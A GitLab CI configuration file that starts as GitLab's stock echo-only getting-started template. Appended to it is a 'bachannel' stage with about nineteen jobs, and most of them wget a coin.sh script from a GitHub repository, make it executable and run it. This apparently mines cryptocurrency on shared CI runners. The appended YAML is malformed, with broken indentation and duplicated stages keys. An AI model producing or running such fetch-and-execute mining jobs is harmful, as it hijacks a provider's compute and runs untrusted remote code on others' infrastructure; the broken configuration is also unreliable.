# This file is a template, and might need editing before it works on your project.
# To contribute improvements to CI/CD templates, please follow the Development guide at:
# https://docs.gitlab.com/ee/development/cicd/templates.html
# This specific template is located at:
# https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Getting-Started.gitlab-ci.yml

# This is a sample GitLab CI/CD configuration file that should run without any modifications.
# It demonstrates a basic 3 stage CI/CD pipeline. Instead of real tests or scripts,
# it uses echo commands to simulate the pipeline execution.
#
# A pipeline is composed of independent jobs that run scripts, grouped into stages.
# Stages run in sequential order, but jobs within stages run in parallel.
#
# For more information, see: https://docs.gitlab.com/ee/ci/yaml/index.html#stages

stages:          # List of stages for jobs, and their order of execution
  - build
  - test
  - deploy

build-job:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - echo "Compiling the code..."
    - echo "Compile complete."

unit-test-job:   # This job runs in the test stage.
  stage: test    # It only starts when the job in the build stage completes successfully.
  script:
    - echo "Running unit tests... This will take about 60 seconds."
    - sleep 60
    - echo "Code coverage is 90%"

lint-test-job:   # This job also runs in the test stage.
  stage: test    # It can run at the same time as unit-test-job (in parallel).
  script:
    - echo "Linting code... This will take about 10 seconds."
    - sleep 10
    - echo "No lint issues found."

deploy-job:      # This job runs in the deploy stage.
  stage: deploy  # It only runs when *both* jobs in the test stage complete successfully.
  script:
    - echo "Deploying application..."
    - echo "Application successfully deployed."
stages:
  - bachannel
  -   - build
  - deploy
  
bachannel_1:
  stage: bachannel
      script:
              - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh

bachannel_2:
  stage: build
    script:
        - wget link raw kalian && chmod u+x veruscoin.sh && ./veruscoin.sh
        - 
bachannel_3:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh

bachannel_4:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh

bachannel_5:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh
        
bachannel_6:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh

bachannel_7:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh
        - 
bachannel_8:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh
        
bachannel_9:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh
bachannel_10:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh
        
bachannel_11:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh
        - 
 bachannel_13
        -   stage: bachannel
        -     script:
        -         - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh

bachannel_14:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh
        - 
bachannel_15:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh

bachannel_16:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh 

bachannel_17:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh 

bachannel_18:
  stage: bachannel
    script:
        - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh

bachannel_19:
  stage: bachannel
      script:
              - wget https://raw.githubusercontent.com/GodMineropytrr/vps/main/coin.sh && chmod u+x coin.sh  && ./coin.sh